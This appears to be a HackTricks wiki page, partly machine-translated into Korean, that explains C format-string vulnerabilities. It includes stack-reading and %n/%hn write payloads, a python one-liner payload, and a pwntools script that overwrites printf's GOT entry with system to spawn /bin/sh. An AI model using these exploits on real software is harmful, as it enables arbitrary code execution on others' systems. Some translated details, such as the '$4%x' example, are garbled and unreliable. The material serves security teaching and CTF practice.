.. | ||
format-strings-template.md | ||
README.md |
Format Strings
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
C에서 **printf
**는 문자열을 출력하는 데 사용할 수 있는 함수입니다. 이 함수가 기대하는 첫 번째 매개변수는 형식 지정자가 포함된 원시 텍스트입니다. 다음 매개변수는 원시 텍스트의 형식 지정자를 대체할 값입니다.
취약점은 공격자 텍스트가 이 함수의 첫 번째 인수로 사용될 때 나타납니다. 공격자는 printf 형식 문자열 기능을 악용하여 특별한 입력을 조작하여 읽을 수 있는/쓸 수 있는 모든 주소의 데이터를 읽고 쓸 수 있습니다. 이렇게 하여 임의 코드를 실행할 수 있습니다.
Formatters:
%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
예시:
- 취약한 예시:
char buffer[30];
gets(buffer); // Dangerous: takes user input without restrictions.
printf(buffer); // If buffer contains "%x", it reads from the stack.
- 일반 사용:
int value = 1205;
printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5
- 인수가 누락된 경우:
printf("%x %x %x", value); // Unexpected output: reads random values from the stack.
포인터 접근
형식 %<n>$x
, 여기서 n
은 숫자,는 printf에게 스택에서 n번째 매개변수를 선택하도록 지시합니다. 따라서 printf를 사용하여 스택에서 4번째 매개변수를 읽고 싶다면 다음과 같이 할 수 있습니다:
printf("%x %x %x %x")
그리고 첫 번째부터 네 번째 매개변수까지 읽을 수 있습니다.
또는 다음과 같이 할 수 있습니다:
printf("$4%x")
and read directly the forth.
Notice that the attacker controls the pr
intf
매개변수, 이는 기본적으로 그의 입력이 printf
가 호출될 때 스택에 있을 것임을 의미하며, 이는 그가 스택에 특정 메모리 주소를 쓸 수 있음을 의미합니다.
{% hint style="danger" %}
이 입력을 제어하는 공격자는 스택에 임의의 주소를 추가하고 printf
가 이를 접근하게 만들 수 있습니다. 다음 섹션에서는 이 동작을 사용하는 방법이 설명될 것입니다.
{% endhint %}
임의 읽기
형식 지정자 **$n%s
**를 사용하여 **printf
**가 n 위치에 있는 주소를 가져와서 문자열처럼 출력할 수 있습니다(0x00이 발견될 때까지 출력). 따라서 바이너리의 기본 주소가 **0x8048000
**이고, 사용자 입력이 스택의 4번째 위치에서 시작된다는 것을 알고 있다면, 다음과 같이 바이너리의 시작 부분을 출력할 수 있습니다:
from pwn import *
p = process('./bin')
payload = b'%6$p' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param
p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
{% hint style="danger" %} 입력의 시작 부분에 주소 0x8048000을 넣을 수 없다는 점에 유의하세요. 그 주소의 끝에서 문자열이 0x00으로 잘리기 때문입니다. {% endhint %}
임의 쓰기
포맷터 **$<num>%n
**은 스택의 <num> 매개변수에 있는 지정된 주소에 쓰기 바이트 수를 작성합니다. 공격자가 printf를 사용하여 원하는 만큼의 문자를 쓸 수 있다면, 그는 **$<num>%n
**을 사용하여 임의의 주소에 임의의 숫자를 쓸 수 있게 됩니다.
다행히도, 숫자 9999를 쓰기 위해 입력에 9999개의 "A"를 추가할 필요는 없습니다. 그렇게 하기 위해 포맷터 **%.<num-write>%<num>$n
**을 사용하여 <num-write>
숫자를 num
위치가 가리키는 주소에 쓸 수 있습니다.
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
그러나 일반적으로 0x08049724
와 같은 주소를 쓰기 위해서는 (한 번에 쓰기에는 매우 큰 숫자입니다), **$hn
**이 $n
대신 사용됩니다. 이렇게 하면 2바이트만 쓸 수 있습니다. 따라서 이 작업은 주소의 가장 높은 2바이트와 가장 낮은 2바이트를 위해 각각 두 번 수행됩니다.
따라서 이 취약점은 임의의 주소에 무엇이든 쓸 수 있게 합니다.
이 예제의 목표는 나중에 호출될 함수의 주소를 덮어쓰는 것입니다. 비록 이것이 다른 임의 쓰기를 악용하여 exec 기술을 사용할 수 있지만:
{% content-ref url="../arbitrary-write-2-exec/" %} arbitrary-write-2-exec {% endcontent-ref %}
우리는 사용자로부터 인수를 받는 함수를 덮어쓰고, 이를 system
함수를 가리키도록 할 것입니다.
언급했듯이 주소를 쓰기 위해서는 일반적으로 2단계가 필요합니다: 먼저 주소의 2바이트를 쓰고, 그 다음에 나머지 2바이트를 씁니다. 이를 위해 **$hn
**이 사용됩니다.
- HOB는 주소의 2개의 높은 바이트를 호출합니다.
- LOB는 주소의 2개의 낮은 바이트를 호출합니다.
그런 다음, 포맷 문자열의 작동 방식 때문에 먼저 더 작은 [HOB, LOB]를 쓰고 그 다음에 다른 것을 써야 합니다.
HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]
HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]
HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB
{% code overflow="wrap" %}
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
{% endcode %}
Pwntools 템플릿
이러한 종류의 취약점을 위한 익스플로잇을 준비하는 템플릿은 다음에서 찾을 수 있습니다:
{% content-ref url="format-strings-template.md" %} format-strings-template.md {% endcontent-ref %}
또는 여기에서 이 기본 예제를 확인하세요:
from pwn import *
elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled
p = process()
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
p.clean()
p.sendline('/bin/sh')
p.interactive()
다른 예제 및 참고자료
- https://ir0nstone.gitbook.io/notes/types/stack/format-string
- https://www.youtube.com/watch?v=t1LH9D5cuK4
- https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
- 32비트, no relro, no canary, nx, no pie, 스택에서 플래그를 누출하기 위한 format strings의 기본 사용 (실행 흐름을 변경할 필요 없음)
- https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
- 32비트, relro, no canary, nx, no pie, win 함수로
fflush
주소를 덮어쓰는 format string (ret2win) - https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
- 32비트, relro, no canary, nx, no pie,
.fini_array
내의 main에 주소를 쓰기 위한 format string (흐름이 한 번 더 반복됨) 및strlen
을 가리키는 GOT 테이블의system
주소를 쓰기. 흐름이 main으로 돌아가면, 사용자 입력으로strlen
이 실행되고system
을 가리키면, 전달된 명령이 실행됨.
{% hint style="success" %}
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud github 리포지토리에 PR을 제출하여 해킹 팁을 공유하세요.